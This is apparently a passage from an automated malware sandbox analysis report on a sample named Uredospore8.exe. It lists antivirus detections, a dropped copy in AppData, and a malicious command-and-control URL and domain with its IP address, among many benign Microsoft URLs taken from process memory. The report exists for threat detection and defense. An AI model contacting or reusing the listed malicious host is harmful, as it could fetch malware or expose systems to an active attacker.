Uredospore8.exe	100%	Avira	HEUR/AGEN.1335517
Uredospore8.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	100%	Avira	HEUR/AGEN.1335517
C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://login.windows.net	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://xsts.auth.xboxlive.com	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://aefd.nelreports.net/api/report?cat=bingaotak	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://login.windows.local	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://reactjs.org/docs/error-decoder.html?invariant=	0%	URL Reputation	safe
https://aefd.nelreports.net/api/report?cat=wsb	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=w	0%	Avira URL Cloud	safe
https://login.windows.local/	0%	URL Reputation	safe
https://api.msn.com/I	0%	Avira URL Cloud	safe
https://substrate.office365.us	0%	Avira URL Cloud	safe
https://excel.office.coms	0%	Avira URL Cloud	safe
https://assets.activity.windows.com/v1/assets	0%	Avira URL Cloud	safe
https://substrate.office.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs	0%	Avira URL Cloud	safe
https://xsts.auth.xboxlive.comwy	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	0%	Avira URL Cloud	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://assets.activity.windows.comP	0%	Avira URL Cloud	safe
https://fb.me/react-polyfills	0%	URL Reputation	safe
https://aefd.nelreports.net/api/report?cat=bingrms	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://word.office.comM	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
https://mths.be/fromcodepoint	0%	Avira URL Cloud	safe
https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	0%	Avira URL Cloud	safe
https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817	0%	Avira URL Cloud	safe
http://lkebgoxdejyq.com/preview/	100%	Avira URL Cloud	malware
https://substrate.office.com/M365.Access	0%	Avira URL Cloud	safe
https://powerpoint.office.comcembere	0%	Avira URL Cloud	safe
https://wns.windows.com/j	0%	Avira URL Cloud	safe
https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	0%	Avira URL Cloud	safe
https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31	0%	Avira URL Cloud	safe
https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	0%	Avira URL Cloud	safe
https://wns.windows.com/e	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	0%	Avira URL Cloud	safe
https://ntp.msn.com/web-widget?form=M	0%	Avira URL Cloud	safe
https://excel.office.com-	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	0%	Avira URL Cloud	safe
https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31"	0%	Avira URL Cloud	safe
https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	Avira URL Cloud	safe
https://activity.windows.comt	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	0%	Avira URL Cloud	safe
https://outlook.office.com/M365.AccessZ	0%	Avira URL Cloud	safe
https://login.windows.net/	0%	Avira URL Cloud	safe
https://substrate.office.com/search/api651e5875e6d946c7adbf63b2ebc3ea64https://loki.delve.office.com	0%	Avira URL Cloud	safe
https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1	0%	Avira URL Cloud	safe
https://powerpoint.office.comEMd	0%	Avira URL Cloud	safe
http://schemas.live.com/Web/	0%	Avira URL Cloud	safe
https://outlook.come	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	Avira URL Cloud	safe
https://substrate.office.com/dsapi/v1.0/	0%	Avira URL Cloud	safe
https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w"	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	0%	Avira URL Cloud	safe
https://substrate.office.com/SubstrateSearch-Internal.ReadWrite	0%	Avira URL Cloud	safe
https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz"	0%	Avira URL Cloud	safe
https://assets.activity.windows.com	0%	Avira URL Cloud	safe
https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817"	0%	Avira URL Cloud	safe
https://activity.windows.com	0%	Avira URL Cloud	safe
https://outlook.office.com/M365.Access394866fc-eedb-4f01-8536-3ff84b16be2a72f988bf-86f1-41af-91ab-2d	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei	0%	Avira URL Cloud	safe
https://www.msn.com:443/en-us/feed	0%	Avira URL Cloud	safe
https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1"	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-	0%	Avira URL Cloud	safe
https://assets.activity.windows.com/v1/assets/$batch	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	Avira URL Cloud	safe
https://xsts.auth.xboxlive.com/	0%	Avira URL Cloud	safe
https://fb.me/react-polyfillsThis	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
lkebgoxdejyq.com	216.218.185.162	true	true	unknown
www.google.com	142.250.186.68	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://lkebgoxdejyq.com/preview/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=w	SearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.net	svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://substrate.office365.us	SearchApp.exe, 0000000D.00000000.2307269362.0000027A80A2C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.activity.windows.com/v1/assets	svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/I	explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://excel.office.coms	StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xsts.auth.xboxlive.com	svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.comM	explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xsts.auth.xboxlive.comwy	SearchApp.exe, 0000000D.00000000.2284398647.0000027A7E2F2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs	SearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.activity.windows.comP	svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingaotak	SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://mths.be/fromcodepoint	SearchApp.exe, 0000000D.00000000.2274494136.0000027A7D51C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2301318078.0000027A80184000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817	SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000004.00000000.2194969646.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2194982780.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2193205458.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000B.00000002.3372811032.000002C8A67C0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs	SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.local	svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://substrate.office.com/M365.Access	SearchApp.exe, 0000000D.00000000.2329609042.0000027A91A70000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcembere	StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/j	explorer.exe, 00000004.00000003.2980021268.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450243606.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981054570.000000000C364000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981252114.000000000C374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076032675.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075818736.000000000C377000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs	SearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/e	explorer.exe, 00000004.00000000.2196219993.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w	SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.com	StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31	SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reactjs.org/docs/error-decoder.html?invariant=	SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aefd.nelreports.net/api/report?cat=wsb	SearchApp.exe, 0000000D.00000000.2273444241.000002727D3A2000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2264186736.000002727C2B2000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com-	explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ntp.msn.com/web-widget?form=M	SearchApp.exe, 0000000D.00000000.2306449484.0000027A80982000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31"	SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs	SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.comt	svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://%s.xboxlive.com	svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.local/	svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.office.com/M365.AccessZ	SearchApp.exe, 0000000D.00000000.2318850916.0000027A91528000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://substrate.office.com	SearchApp.exe, 0000000D.00000000.2329926503.0000027A91A9C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2306685905.0000027A809C7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2331674767.0000027A91B30000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.windows.net/	svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://substrate.office.com/search/api651e5875e6d946c7adbf63b2ebc3ea64https://loki.delve.office.com	SearchApp.exe, 0000000D.00000000.2281866725.0000027A7DF30000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comEMd	explorer.exe, 00000004.00000000.2198248903.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1	SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.live.com/Web/	SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000004.00000003.2980021268.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450243606.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981054570.000000000C364000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981252114.000000000C374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076032675.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075818736.000000000C377000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://substrate.office.com/dsapi/v1.0/	SearchApp.exe, 0000000D.00000000.2307269362.0000027A80A2C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w"	SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.come	explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000004.00000003.2979250085.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2196219993.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2979898080.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076151253.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076523652.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450962269.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fb.me/react-polyfills	SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingrms	SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://substrate.office.com/SubstrateSearch-Internal.ReadWrite	SearchApp.exe, 0000000D.00000000.2286028809.0000027A7E508000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
